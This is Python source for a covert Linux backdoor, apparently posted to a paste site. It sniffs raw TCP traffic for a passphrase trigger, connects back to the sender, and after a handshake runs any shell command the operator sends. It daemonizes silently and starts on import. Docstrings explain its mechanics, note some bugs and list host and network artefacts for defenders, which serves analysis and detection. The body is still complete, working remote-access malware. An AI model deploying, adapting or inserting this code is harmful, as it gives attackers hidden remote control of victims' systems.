WhichHat

Backdoor.py

Mar 24th, 2017
  1. #!/usr/bin/python3
  2.  
  3. import socket
  4. import os
  5. import getpass
  6. import subprocess
  7. import platform
  8. import sys
  9. from struct import *
  10.  
  11.  
def BackdoorGetSystemInfo(skt: socket.socket) -> None:
    """Answer two fixed operator requests on an already-connected socket.

    First message: if it is "Report", run ``whoami`` and send back a
    shell-style prompt of the form ``user@distro:`` followed by ``#`` for
    root or ``$`` otherwise. Second message: if it is "Location", run
    ``pwd`` and send the current directory. Any other text is ignored and
    nothing is sent for that step.

    For defenders: a fresh outbound TCP connection immediately followed by
    ``whoami`` and ``pwd`` children of the same process is the observable
    sequence here.
    """
    command = skt.recv(1024)
    prompt = []
    if type(command) == bytes:
        command=command.decode("utf-8")
    if command.strip() == "Report":
        # stderr is captured into ``err`` but never used.
        p = subprocess.Popen(['whoami'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out, err = p.communicate()
        user = out.strip().decode("utf-8")
        prompt.append(user+"@")
        # platform.dist() was removed in Python 3.8; on a current interpreter
        # this raises AttributeError, which nothing in this function catches.
        prompt.append(platform.dist()[0]+":")
        separator = "$"
        if user == "root":
            separator = "#"
        prompt.append(separator)
        prompt = "".join(prompt)
        skt.send(str.encode(prompt))
    command = skt.recv(1024)
    if type(command) == bytes:
        command=command.decode("utf-8")
    if command.strip() == "Location":
        # os.popen runs ``pwd`` through the shell; only stdout is read.
        proc = os.popen("pwd")
        location = ""
        for i in proc.readlines():
            location += i
        location = location.strip()
        skt.send(str.encode(location))
    return
  40.  
  41.  
def BackdoorCmd(skt: socket.socket, command: str) -> None:
    """Run *command* through the system shell and send its stdout to the peer.

    ``os.popen`` hands the string to a shell, so pipes and chained commands
    work (the inline comment below about the subprocess alternative refers
    to that). Only stdout is captured; stderr is not sent back. Empty output
    is replaced by the fixed marker "daemonnoreport" so the peer always gets
    a reply. Any exception at all, not just a missing command, results in
    the "not found" message.

    For defenders: each operator command becomes a shell child of this
    process, which is the process-tree artefact to look for.
    """
    try:
        proc = os.popen(command) # counterpart : can't have any error message
        output = ""
        for i in proc.readlines():
            output += i
        output = output.strip()
        if output == "":
            output = "daemonnoreport" #send this to avoid troublesome padding
        skt.send(str.encode(output))
        # Equivalent using subprocess but has trouble with chained commands
    except Exception as err:
        # print goes to the daemon's stderr (see daemonize for where that ends up).
        print(err.args)
        skt.send(str.encode("Error : command '"+command+"' not found"))
  57.  
  58.  
def BackdoorSniffer():
    """Block until a TCP segment whose entire payload is "passphrase1" is seen.

    Opens a raw IPv4/TCP socket (on Linux this requires root or
    CAP_NET_RAW, so the sample only works when already running privileged),
    parses the IPv4 and TCP headers with ``struct.unpack`` and compares the
    UTF-8 decoded payload with the fixed trigger string. Returns
    ``(saddr, sport, daddr, dport)`` of the matching segment: the sender's
    address/port first, then the local address/port that was hit. Never
    returns otherwise.

    For defenders: the raw socket is the host-side artefact (an
    unprivileged process cannot open one), and the trigger is an ordinary
    TCP segment carrying a constant payload, so it can be matched on the
    wire or in flow logs.
    """
    skt = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
    while True:
        pkt = skt.recvfrom(65535)
        # recvfrom returns (bytes, address); keep only the bytes.
        pkt = pkt[0]
        # Fixed 20-byte IPv4 header; IP options are accounted for via IHL below.
        ipHeader = pkt[0:20]
        # Unpack the IPv4 header fields.
        iph = unpack('!BBHHHBBH4s4s' , ipHeader)
        saddr = socket.inet_ntoa(iph[8])
        daddr = socket.inet_ntoa(iph[9])
        versionIhl = iph[0]
        version = versionIhl >> 4  # computed but not used
        ihl = versionIhl & 0xF
        iphLength = ihl*4
        tcpHeader = pkt[iphLength:iphLength+20]
        tcph = unpack('!HHLLBBHHH' , tcpHeader)
        sport = tcph[0]
        dport = tcph[1]
        # Data offset (in 32-bit words) lives in the high nibble of this byte.
        doffReserved = tcph[4]
        tcphLength = doffReserved >> 4  
        hSize = iphLength + tcphLength*4
        dataSize = len(pkt) - hSize  # computed but not used
         
        # Everything after the two headers is the TCP payload.
        data = pkt[hSize:]
        try:
            if type(data) == bytes:
                data = data.decode("utf-8")
            if data == "passphrase1":
                # inet_ntoa returns str and unpack('H') returns int, so these
                # two conversions never trigger.
                if type(saddr) == bytes:
                    saddr = saddr.decode("utf-8")
                if type(sport) == bytes:
                    sport = sport.decode("utf-8")
                return saddr, sport, daddr, dport
        except:
            # A non-UTF-8 payload raises UnicodeDecodeError and is skipped;
            # the bare except also swallows anything else and keeps sniffing.
            pass
  97.  
def BackdoorInit():
    """Connect back to the sender of the trigger and complete the passphrase handshake.

    Note the unpacking: ``BackdoorSniffer`` returns (sender addr, sender
    port, local addr, local port), which is bound here as
    ``daddr, dport, saddr, sport``. The new socket is therefore bound to the
    local address/port the trigger segment hit and connected to the
    trigger's source. If bind or connect fail (e.g. the local port is
    already in use), or the peer's first message is not "passphrase2",
    returns None; otherwise replies "passphrase3" and returns the connected
    socket.

    For defenders: the artefact is an outbound TCP connection whose source
    port equals the destination port of the trigger segment, followed by a
    short fixed-string exchange.
    """
    skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    daddr, dport, saddr, sport = BackdoorSniffer()
    try:
        skt.bind((saddr, sport))
        skt.connect((daddr, dport))
    except:
        # Any failure here is silently reported as "no session" to the caller.
        return None
    command = skt.recv(1024)
    if type(command)==bytes:
        command=command.decode("utf-8")
    if command.strip() == "passphrase2":
        skt.send(b"passphrase3")
       
        return skt
    else:
        # The socket is not closed on a failed handshake; it is simply dropped.
        return None
  116.        
  117.  
def BackdoorShell(skt: socket.socket) -> bool:
    """Command loop: read operator messages and act on them until told to stop.

    ``cd`` is handled in-process with ``os.chdir`` (``str.strip("cd ")``
    strips any of the characters c, d and space from both ends of the
    message) and the new directory is then reported via ``pwd``. "exit"
    closes the socket and returns True, so the caller goes back to waiting
    for a trigger; "release" closes it and returns False, so the caller
    stops. Anything else is passed to ``BackdoorCmd`` as a shell command.

    Any exception inside the loop is answered with a fixed error string. An
    empty ``recv`` (peer gone) also lands there via the IndexError from
    ``split()[0]``; if the ``send`` in the handler then raises as well, that
    exception escapes this function.
    """
    while True:
       
        try:
            command = skt.recv(1024)
            if type(command)==bytes:
                command=command.decode("utf-8")
            if command.strip().split()[0] == "cd":
                os.chdir(command.strip("cd "))
                BackdoorCmd(skt, "pwd")
            elif command.strip().lower() == "exit":
                skt.send(b"exited")
                skt.close()
                break
            elif command.strip().lower() == "release":
                skt.send(b"released")
                skt.close()
                return False
            else:
                BackdoorCmd(skt, command)
        except Exception:
            skt.send(b"Error : An unexpected error has occurred.")
       
    return True
  142.  
  143.  
def Backdoor() -> None:
    """Main loop: wait for a trigger, serve one operator session, repeat.

    ``BackdoorInit`` returns None whenever the connect-back or handshake
    fails, in which case the loop goes straight back to sniffing. A session
    ended with "exit" (``BackdoorShell`` returns True) loops back as well;
    only "release" (returns False) ends this loop.
    """
    while True:
        skt = BackdoorInit()
        if skt == None:
            continue
        BackdoorGetSystemInfo(skt)
        if not BackdoorShell(skt):
            break
    return
  153.  
def daemonize () -> None:
    """Detach from the terminal with the classic double fork, then run Backdoor().

    The first fork plus ``setsid`` drops the controlling terminal and
    session; the second fork ensures the daemon can never reacquire one.
    ``chdir("/")`` and ``umask(0)`` decouple it from the launching directory
    and umask; note umask 0 means files later created by operator commands
    carry no default permission restriction. stdin, stdout and stderr are
    all rerouted to /dev/null, so the ``print`` calls elsewhere in this file
    produce nothing once running.

    For defenders: the resulting process is reparented to init, has no
    controlling tty and cwd "/", and holds the raw socket opened in
    ``BackdoorSniffer``.
    """
    stdin='/dev/null'
    stdout='/dev/null'
    stderr='/dev/null'
    # Perform first fork.
    try:
        pid = os.fork()
        if pid > 0:
            sys.exit(0) # Exit first parent.
    except OSError as e:
        print(e.args)
        sys.exit(1)
    # Decouple from parent environment.
    os.chdir("/")
    os.umask(0)
    os.setsid()
    # Perform second fork.
    try:
        pid = os.fork( )
        if pid > 0:
            sys.exit(0) # Exit second parent.
    except OSError as e:
        print(e.args)
        sys.exit(1)
    # The process is now daemonized, redirect standard file descriptors.
    for f in sys.stdout, sys.stderr:
        f.flush( )
    si = open(stdin, 'r')
    so = open(stdout, 'a+')
    se = open(stderr, 'a+')
    os.dup2(si.fileno( ), sys.stdin.fileno( ))
    os.dup2(so.fileno( ), sys.stdout.fileno( ))
    os.dup2(se.fileno( ), sys.stderr.fileno( ))

    # Never returns unless BackdoorShell receives "release".
    Backdoor()
  189.  
# Module-level side effect: merely importing or running this file forks,
# detaches and starts the sniffer loop.
daemonize()